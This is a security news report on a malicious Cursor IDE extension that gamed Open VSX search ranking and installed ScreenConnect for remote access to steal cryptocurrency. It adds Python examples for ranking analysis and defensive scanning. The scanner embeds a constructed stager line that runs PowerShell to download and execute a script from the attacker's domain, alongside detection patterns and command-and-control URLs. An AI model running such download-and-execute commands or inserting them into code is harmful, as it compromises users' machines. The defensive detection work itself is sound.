
A sophisticated supply-chain attack has stolen $500,000 in cryptocurrency assets from Russian blockchain developers through a malicious extension targeting the Cursor AI integrated development environment.
The attack, which took place in June 2025, raises concerns about the evolution of supply chain attacks that exploit the growing popularity of AI-assisted development tools.
The incident began when the victim, a security-conscious developer who had recently installed a fresh operating system, searched for a Solidity syntax-highlighting extension within the Cursor AI IDE.
Despite using online malware detection services and maintaining strict security practices, the developer inadvertently installed a malicious package disguised as a legitimate development tool.
The fake extension, published under the name "Solidity Language", had accumulated 54,000 downloads before being detected and removed.
What makes this attack particularly insidious is its abuse of the registry's search ranking algorithm to place the malicious extension above its legitimate alternative.
The attacker exploited the Open VSX registry's relevance-based ranking system, which takes into account factors such as update recency, download counts, and ratings.
By publishing the malicious extension with an update date of June 15, 2025, the attackers pushed it to fourth place in the search results, while the authentic extension, last updated on May 30, 2025, ranked eighth.
Securelist analysts identified the malware after conducting forensic analysis of the victim's compromised system.
The investigation revealed that the malicious extension provided no actual syntax highlighting and instead acted as a dropper for a multi-stage attack chain.
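As an added illustration (not code from Securelist or Open VSX), the following toy Python model shows how a recency-weighted relevance score lets a freshly published package outrank an established one, and adds the lookalike check a registry or a security team could run over search results. The scoring formula and its weights, the legitimate publisher name, and the download and rating figures are assumptions; only the dates and the "solidityai" namespace come from this report.

```python
"""Added example, not from the report: a toy model of a recency-weighted
marketplace relevance ranking, plus a lookalike check over the results.
The scoring formula, its weights, the legitimate publisher name and the
download/rating figures are assumptions; this is not Open VSX's algorithm."""
import math
from dataclasses import dataclass
from datetime import date
from difflib import SequenceMatcher


@dataclass(frozen=True)
class Listing:
    name: str
    publisher: str
    updated: date
    downloads: int
    rating: float  # 0..5


def relevance_score(entry: Listing, today: date) -> float:
    """Hypothetical relevance: a recent update, more downloads and a better
    rating all raise the score, and recency carries the largest weight."""
    days_old = max((today - entry.updated).days, 0)
    recency = 1.0 / (1.0 + days_old / 7.0)            # halves after a week
    popularity = math.log10(entry.downloads + 1) / 7   # ~1.0 at ten million
    return 0.5 * recency + 0.3 * popularity + 0.2 * (entry.rating / 5.0)


def rank(listings, today: date):
    return sorted(listings, key=lambda e: relevance_score(e, today), reverse=True)


def flag_lookalikes(listings, min_similarity: float = 0.6, download_ratio: int = 10):
    """Flag a listing whose name closely matches another listing from a
    different publisher that has at least download_ratio times its downloads."""
    flagged = []
    for cand in listings:
        for other in listings:
            if cand is other or cand.publisher == other.publisher:
                continue
            similarity = SequenceMatcher(None, cand.name.lower(), other.name.lower()).ratio()
            if similarity >= min_similarity and other.downloads >= download_ratio * cand.downloads:
                flagged.append((cand.publisher, cand.name, other.publisher, other.name))
                break
    return flagged


# Constructed listings. "solidityai" is the publisher namespace seen in the
# installed extension path and the dates are those given in the report; the
# legitimate publisher name and all download/rating figures are invented.
TODAY = date(2025, 6, 16)
LISTINGS = [
    Listing("Solidity", "legit-publisher", date(2025, 5, 30), 2_000_000, 4.6),
    Listing("Solidity Language", "solidityai", date(2025, 6, 15), 54_000, 5.0),
    Listing("Prettier Solidity", "another-publisher", date(2025, 4, 1), 300_000, 4.5),
]


def demo_order():
    """Publishers in ranked order for the constructed listings."""
    return [e.publisher for e in rank(LISTINGS, TODAY)]


if __name__ == "__main__":
    for e in rank(LISTINGS, TODAY):
        print(f"{relevance_score(e, TODAY):.3f}  {e.publisher}/{e.name}")
    print("lookalikes:", flag_lookalikes(LISTINGS))
```

With these weights the one-day-old listing scores above the established one despite having a fraction of its downloads, which is the effect the report describes; the lookalike check catches it because its name nearly matches a far more downloaded listing under a different publisher. A name-similarity check is a heuristic, so in practice it would feed a manual review queue rather than block publication outright.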
Infection chain
The infection mechanism demonstrates a sophisticated understanding of both social engineering and evasion techniques.
[Figure: the malicious and legitimate (green) extensions (Source: Securelist)]
Once installed, the malicious extension file at %userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.js immediately began contacting the command-and-control server angelic[.]su.
The first PowerShell script, retrieved from https://angelic[.]su/files/1.txt, checked whether the victim's machine already had the ScreenConnect remote management software installed.
If ScreenConnect was not detected, the malware downloaded a secondary script from https://angelic[.]su/files/2.txt, which then fetched the ScreenConnect installer from https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi.
This legitimate remote access tool was configured to communicate with the attacker's relay server relay.lmfao[.]su, giving the attackers persistent access to the compromised system.
The use of legitimate management tools is a common tactic among sophisticated persistent threat actors, allowing malicious activity to blend in with normal system administration.
The attack infrastructure points to a well-organized operation that extends beyond this single incident.
Researchers also discovered related malicious packages, including "solsafe" in the npm registry, as well as three additional Visual Studio Code extensions.
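The chain above lends itself to host-side detection. The following Python script is an added example (not Securelist's tooling): it scans a Cursor extensions directory for the domains named in this report and for PowerShell download-and-execute staging in extension JavaScript, and checks a ScreenConnect client command line for a relay host that is not on an allowlist. The sample extension tree and both extension.js bodies are constructed for the demonstration, and the ScreenConnect command-line format is an assumption.

```python
"""Added example (not Securelist's tooling and not from the report): a
defender-side scanner for the indicators this incident exposed. It checks
installed Cursor/VS Code extensions for the C2 and relay domains named above
and for PowerShell download-and-execute staging inside extension JavaScript,
and checks a ScreenConnect client command line for an unexpected relay host.
The sample extension tree is constructed in a temporary directory and the
extension.js contents are invented for the demonstration."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qs

# Hosts from the report, in plain (non-defanged) form so they match raw strings.
KNOWN_BAD_HOSTS = ("angelic.su", "lmfao.su")

# Generic staging behaviour rather than this campaign's exact script names.
SUSPICIOUS_PATTERNS = {
    "powershell_spawn": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "remote_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "exec_from_string": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "remote_msi": re.compile(r"https?://[^\s\"']+\.msi\b", re.I),
}


def scan_extension_js(text: str) -> List[str]:
    """Return the sorted indicator names found in one JavaScript source."""
    hits = set()
    lowered = text.lower().replace("[.]", ".")   # also catch defanged copies
    for host in KNOWN_BAD_HOSTS:
        if host in lowered:
            hits.add(f"ioc_host:{host}")
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(text):
            hits.add(name)
    return sorted(hits)


def scan_extensions_dir(root) -> Dict[str, List[str]]:
    """Walk <root>/<publisher>.<name>-<version>/ and report findings per extension."""
    report = {}
    for ext_dir in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        findings = set()
        for js in ext_dir.rglob("*.js"):
            findings.update(scan_extension_js(js.read_text(errors="ignore")))
        report[ext_dir.name] = sorted(findings)
    return report


def screenconnect_relay_host(cmdline: str) -> Optional[str]:
    """Extract the relay host (h=...) from a ScreenConnect client command line.
    Assumed format: ...ScreenConnect.ClientService.exe "?e=Access&h=<host>&p=<port>..."
    """
    m = re.search(r'"\?([^"]*)"', cmdline)
    if not m:
        return None
    return parse_qs(m.group(1)).get("h", [None])[0]


def relay_host_is_expected(cmdline: str, allowed_hosts: Set[str]) -> bool:
    """True only when the client points at a relay host the organisation operates."""
    host = screenconnect_relay_host(cmdline)
    return host is not None and host.lower() in allowed_hosts


# ---- constructed sample data -------------------------------------------------
BENIGN_JS = """
const vscode = require('vscode');
function activate(ctx) {
  ctx.subscriptions.push(vscode.languages.registerHoverProvider('solidity', {
    provideHover() { return new vscode.Hover('Solidity keyword'); }
  }));
}
module.exports = { activate };
"""

# Invented stand-in for a stager: spawns PowerShell to fetch and run a remote script.
MALICIOUS_JS = """
const cp = require('child_process');
function activate() {
  cp.exec('powershell -w hidden -c "iex (New-Object Net.WebClient).DownloadString(\\'https://angelic.su/files/1.txt\\')"');
}
module.exports = { activate };
"""


def build_sample_tree(root: Path) -> None:
    good = root / "goodpublisher.solidity-0.1.0" / "out"           # invented benign extension
    bad = root / "solidityai.solidity-1.0.9-universal" / "src"    # path from the report
    good.mkdir(parents=True)
    bad.mkdir(parents=True)
    (good / "extension.js").write_text(BENIGN_JS)
    (bad / "extension.js").write_text(MALICIOUS_JS)


def demo() -> Dict[str, List[str]]:
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_extensions_dir(root)


if __name__ == "__main__":
    for ext, hits in demo().items():
        print(ext, "->", hits or "clean")
    svc = r'"C:\Program Files (x86)\ScreenConnect Client (x)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.lmfao.su&p=8041"'
    print("relay host expected:", relay_host_is_expected(svc, {"support.example.internal"}))
```

On a real machine the root to scan is the %userprofile%\.cursor\extensions directory from this report (or the equivalent VS Code extensions directory), and the ScreenConnect command line would come from the installed service definition. Any extension whose JavaScript spawns PowerShell to fetch remote content deserves review regardless of which domain it contacts, which is why the generic patterns sit alongside the campaign-specific hosts.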
